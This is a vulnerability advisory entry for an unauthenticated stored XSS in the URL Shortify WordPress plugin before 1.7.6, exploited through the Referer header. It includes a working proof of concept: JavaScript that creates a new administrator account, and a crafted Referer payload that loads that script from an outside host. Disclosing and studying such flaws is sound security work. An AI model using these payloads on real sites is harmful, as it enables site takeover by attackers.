Lucene search

K
wpexploitBartlomiej MarekWPEX-ID:1FC71FC7-861A-46CC-A147-1C7ECE9A7776
HistoryAug 21, 2023 - 12:00 a.m.

URL Shortify < 1.7.6 - Unauthenticated Stored XSS via referer header

2023-08-2100:00:00
Bartlomiej Marek
35
url shortify
unauthenticated stored xss
new link
javascript exploit
crafted referer header
administrator interaction
login exploit

0.001 Low

EPSS

Percentile

30.2%

Description The plugin does not properly escape the value of the referer header, thus allowing an unauthenticated attacker to inject malicious javascript that will trigger in the plugins admin panel with statistics of the created short link.

1. Add a new shortened link in the interface <host>/wp-admin/admin.php?page=us_links&action=new, in this case it will be:
<host>/mr83

2. Prepare a JavaScript code that will automatically add a new user with administrator privileges to the website and host it on an external resource, e.g. html.cafe.

const url = 'https://<host>/wp-admin/user-new.php';fetch(url).then(response => response.text()).then(html => {const parser = new DOMParser();const doc = parser.parseFromString(html, 'text/html');const nonceValue = doc.getElementById('_wpnonce_create-user').value;const requestOptions = {method: 'POST',headers: {'Content-Type': 'application/x-www-form-urlencoded'},body: `action=createuser&_wpnonce_create-user=${encodeURIComponent(nonceValue)}&_wp_http_referer=%2Fwp-admin%2Fuser-new.php&user_login=administrator&email [email protected]&first_name=&last_name=&url=&pass1=O%21k6c5%5EfjO%5E1sF%26%24%21%26V2PG9e&pass2=O%21k6c5%5EfjO%5E1sF%26%24%21%26V2PG9e&send_user_notification=0&role=admin &ure_other_roles=&createuser =Add+New+User`};return fetch(url, requestOptions);});

3. Send request with a crafted referer header value.

GET /mr83 HTTP/1.1
Host: <host>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Referer: https://example.com'abc=""onmouseover='var scriptElement=document.createElement(`script`);scriptElement.src=`https://html.cafe/x…d`;document.head .appendChild(scriptElement);
Connection: close

4. Wait for the administrator interaction with the vulnerable "Referer" field in the statistics of the created link.
<host>/wp-admin/admin.php?page=us_links&action=statistics&_wpnonce=5252159b66&id=1

5. Log in to the newly created administrator account.

0.001 Low

EPSS

Percentile

30.2%

Related for WPEX-ID:1FC71FC7-861A-46CC-A147-1C7ECE9A7776